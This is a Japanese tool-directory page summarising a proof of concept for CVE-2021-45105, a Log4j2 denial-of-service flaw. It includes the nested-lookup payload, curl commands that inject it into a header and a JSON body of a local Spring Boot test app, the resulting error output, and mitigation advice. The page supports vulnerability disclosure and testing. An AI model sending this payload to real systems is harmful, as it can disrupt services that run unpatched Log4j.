Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Log4j_dos_CVE-2021-45105 — Spring Boot Web アプリを使用した CVE-2021-45105 (Log4j2 DOS) の PoC エクスプロイト。巧妙に細工された HTTP ヘッダー/ボディのペイロードによる無限ループを実証します。 | Kitploit
ツール/GitHubGitHub/cckuailong/log4j_dos_cve-2021-45105
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubcckuailong/log4j_dos_cve-2021-45105

Log4j_dos_CVE-2021-45105

Spring Boot Web アプリを使用した CVE-2021-45105 (Log4j2 DOS) の PoC エクスプロイト。巧妙に細工された HTTP ヘッダー/ボディのペイロードによる無限ループを実証します。

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
1314年前未レビュー

Log4j2 DOS(CVE-2021-45105)

Poc

root@kitploit:~
${${::-${::-$${::-$}}}}

影響を受けるバージョン: 2.0-beta9 から 2.16.0 までの全バージョン

このアプリケーションは、CVE-2021-45105 の脆弱性がある Spring Boot Web アプリケーションに基づいています。

これは Log4j 2.16.0 を使用しています。

アプリケーションの実行

実行:

root@kitploit:~
Import the project in Java IDE as a maven project

Run CVEMainApplication.java as a spring boot app.

エクスプロイト手順

  • 次のようにしてエクスプロイトをトリガーします:
root@kitploit:~
For GET ->
curl 127.0.0.1:8080 -H 'X-Api-Version: ${${::-${::-$${::-$}}}}'


For Post request ->
curl --location --request POST 'http://127.0.0.1:8080/addrecord' \
--header 'Content-Type: application/json' \
--data '{
	"clientRef": "${${::-${::-$${::-$}}}}"
}'
  • 出力には無限ループが表示されますが、テストではこのDOSがリソースを消費するとは判明しませんでした。この無限ループはプログラムによって識別され、エラーとして出力されます:
root@kitploit:~

 ${ctx:apiVersion} ${ctx:clientRef}2021-12-18 14:29:56,759 http-nio-8080-exec-1 ERROR An exception occurred processing Appender Console java.lang.IllegalStateException: Infinite loop in property interpolation of ::-${::-$${::-j}}: :
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.checkCyclicSubstitution(StrSubstitutor.java:1081)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:1029)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:1042)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:912)
	

緩和策 :

Java 8(以降)のユーザーはリリース 2.17.0 にアップグレードする必要があります。

または、設定で緩和できます:

ログ設定の PatternLayout で、${ctx:loginId} や $${ctx:loginId} のような Context Lookups をスレッドコンテキストマップパターン(%X、%mdc、%MDC)に置き換えてください。

あるいは、設定内で、HTTP ヘッダーやユーザー入力などアプリケーション外のソースから発信される ${ctx:loginId} や $${ctx:loginId} のような Context Lookups への参照を削除してください。

参考

https://issues.apache.org/jira/browse/LOG4J2-3230

ツールをダウンロード